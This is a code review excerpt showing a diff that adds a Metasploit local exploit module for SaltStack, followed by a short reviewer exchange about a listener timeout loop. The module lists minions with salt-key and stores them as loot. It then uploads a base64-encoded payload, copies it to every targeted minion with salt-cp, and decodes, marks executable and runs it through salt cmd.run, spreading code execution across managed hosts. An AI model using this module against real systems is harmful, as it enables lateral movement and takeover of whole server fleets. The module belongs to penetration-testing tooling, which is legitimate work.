modules/exploits/linux/local/saltstack_salt_minion_deployer.rb

```diff
@@ -0,0 +1,155 @@
+
+      @salt = exec
+    end
+    @salt
+  end
+
+  # taken from saltstack_salt.rb module
+  def list_minions
+    # pull minions from a master
+    print_status('Attempting to list minions')
+    unless command_exists?('salt-key')
+      print_error('salt-key not present on system')
+      return
+    end
+
+    count = 0
+
+    begin
+      out = cmd_exec('salt-key', '-L --output=yaml', datastore['TIMEOUT'])
+      vprint_status(out)
+      minions = YAML.safe_load(out)
+    rescue Psych::SyntaxError
+      print_error('Unable to load salt-key -L data')
+      return
+    end
+
+    tbl = Rex::Text::Table.new(
+      'Header' => 'Minions List',
+      'Indent' => 1,
+      'Columns' => ['Status', 'Minion Name']
+    )
+
+    store_path = store_loot('saltstack_minions', 'application/x-yaml', session, minions.to_yaml, 'minions.yaml', 'SaltStack Salt salt-key list')
+    print_good("#{peer} - minion file successfully retrieved and saved to #{store_path}")
+    minions['minions'].each do |minion|
+      tbl << ['Accepted', minion]
+      count += 1
+    end
+
+    print_good(tbl.to_s)
+    print_good("#{count} minions were found accepted, and will attempt to execute payload. Waiting 10 seconds incase this isn't optimal.")
+    Rex.sleep(10)
+  end
+
+  def check
+    return CheckCode::Safe('salt-master does not seem to be installed, unable to find salt-master executable') if salt_master.nil?
+
+    if writable?(datastore['WritableDir'])
+      vprint_good("#{datastore['WritableDir']} is writable, and salt-master executable found")
+      return CheckCode::Vulnerable
+    end
+    CheckCode::Safe("#{datastore['WritableDir']} is not writable")
+  end
+
+  def exploit
+    # Make sure we can write our exploit and payload to the local system
+    fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" unless writable? datastore['WritableDir']
+    list_minions if datastore['CALCULATE']
+
+    payload_name = rand_text_alphanumeric(5..10)
+
+    # due to a bug in older (2021) versions of salt-cp, we need to write ascii files. https://github.com/saltstack/salt/issues/59899
+    upload_and_chmodx "#{datastore['WritableDir']}/#{payload_name}", Rex::Text.encode_base64(generate_payload_exe)
+
+    print_status('Copying payload to minions')
+    cmd_exec("salt-cp '#{datastore['MINIONS']}' '#{datastore['WritableDir']}/#{payload_name}' '#{datastore['TargetWritableDir']}/#{payload_name}.b64'")
+    print_status('Executing payloads')
+    cmd_exec("salt '#{datastore['MINIONS']}' cmd.run 'base64 -d #{datastore['TargetWritableDir']}/#{payload_name}.b64 > #{datastore['TargetWritableDir']}/#{payload_name} && chmod 755 #{datastore['TargetWritableDir']}/#{payload_name} && #{datastore['TargetWritableDir']}/#{payload_name}'")
+
+    # stolen from exploit/multi/handler
+    stime = Time.now.to_f
+    timeout = datastore['ListenerTimeout'].to_i
+    loop do
+      break if timeout > 0 && (stime + timeout < Time.now.to_f)
```

Comment:
Why are we breaking conditionally on a positive, nonzero timeout?  Are we expecting a 0 or negative timeout?  We're not decrementing it that I see?

Reply:
This is 100% taken from `exploit/multi/handler`. Looks like in that module the default is `0` to wait forever.